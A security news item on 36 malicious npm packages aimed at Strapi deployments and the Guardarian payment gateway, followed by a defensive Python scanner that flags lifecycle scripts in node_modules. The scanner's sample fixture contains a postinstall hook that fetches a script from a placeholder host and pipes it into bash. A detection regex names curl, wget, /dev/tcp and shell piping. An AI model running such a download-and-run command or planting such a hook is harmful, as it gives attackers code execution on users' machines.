Guardarian Users Targeted in Malicious NPM Package Attack
A recent supply chain attack has targeted the Strapi ecosystem with 36 malicious NPM packages published from four accounts. The packages carry a range of payloads: code execution through Redis, Docker container escape, credential harvesting, and reverse shells. The attack specifically targets the cryptocurrency payment gateway Guardarian, shipping a Guardarian API module and going after wallet files. The campaign appears tailored to Strapi deployments on Linux, exploiting Redis instances used as Strapi cache backends. Anyone who installed these packages is advised to rotate all credentials, including database passwords and API keys, to limit the damage from a compromise.
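A first triage step for an attack like this is to find out which installed packages can run code at install time at all. The scanner below is an added example written for this article; it is not code from the article, from Strapi, or from Guardarian, and it does not know the 36 package names. It assumes the common delivery vector for malicious npm packages, a lifecycle script (preinstall, install, postinstall, prepare) declared in package.json; the article does not state how these particular payloads execute, so a hit is a lead to inspect, not a verdict. The sample node_modules tree and the package names in it are constructed for the example.

```python
"""Inventory node_modules packages that declare npm lifecycle scripts.

Added example, not code from the article or from the Strapi/Guardarian projects.
Assumption: payloads run via lifecycle scripts; the article does not confirm this,
so inspect the script body and the publishing account before acting on a hit.
"""
import json
import re
import tempfile
from pathlib import Path

LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")
# Heuristic for commands that fetch, decode, or pipe remote content into a shell.
SUSPICIOUS = re.compile(r"curl|wget|/dev/tcp|base64|node\s+-e|bash\s+-c|\|\s*(sh|bash)\b")


def find_lifecycle_scripts(node_modules):
    """Return {package_name: {script_name: command}} for every installed package
    whose package.json declares a lifecycle script. Scoped (@scope/pkg) and
    nested node_modules directories are covered; vendored package.json files
    that are not package roots are ignored."""
    root = Path(node_modules)
    hits = {}
    for pkg_json in root.rglob("package.json"):
        pkg_dir = pkg_json.parent
        parent = pkg_dir.parent
        is_pkg = parent.name == "node_modules" or (
            parent.name.startswith("@") and parent.parent.name == "node_modules")
        if not is_pkg:
            continue
        try:
            meta = json.loads(pkg_json.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip, do not crash the scan
        scripts = meta.get("scripts") or {}
        found = {k: v for k, v in scripts.items() if k in LIFECYCLE}
        if found:
            hits[meta.get("name", pkg_dir.name)] = found
    return hits


def flag_suspicious(hits):
    """Subset of hits whose script commands match the download-and-run heuristic."""
    return {name: scripts for name, scripts in hits.items()
            if any(SUSPICIOUS.search(cmd) for cmd in scripts.values())}


def build_sample_tree():
    """Constructed sample node_modules (hypothetical package names, not real
    packages) so the scan can be run offline."""
    root = Path(tempfile.mkdtemp()) / "node_modules"
    samples = {
        "harmless-lib": {"name": "harmless-lib", "version": "1.0.0"},
        "build-step-lib": {"name": "build-step-lib", "version": "2.1.0",
                           "scripts": {"prepare": "node build.js"}},
        "@example-scope/strapi-plugin-cache-helper": {
            "name": "@example-scope/strapi-plugin-cache-helper", "version": "0.0.3",
            "scripts": {"postinstall": "curl -fsSL http://example.invalid/p.sh | bash"}},
    }
    for rel, meta in samples.items():
        d = root / rel
        d.mkdir(parents=True)
        (d / "package.json").write_text(json.dumps(meta), encoding="utf-8")
    return root


if __name__ == "__main__":
    hits = find_lifecycle_scripts(build_sample_tree())
    flagged = flag_suspicious(hits)
    for name, scripts in hits.items():
        tag = "SUSPICIOUS" if name in flagged else "review"
        print(f"{tag:10} {name}: {scripts}")
```

Point `find_lifecycle_scripts` at a real project's node_modules to get the list of packages that could have executed during install; every entry deserves a look at the command and at who published it. Packages with no lifecycle script are not cleared by this, since a payload can also run when the module is required at application start, and a build-step script such as `node build.js` is only benign once its source has been read. For future installs, `npm install --ignore-scripts` stops this class of payload from running at all.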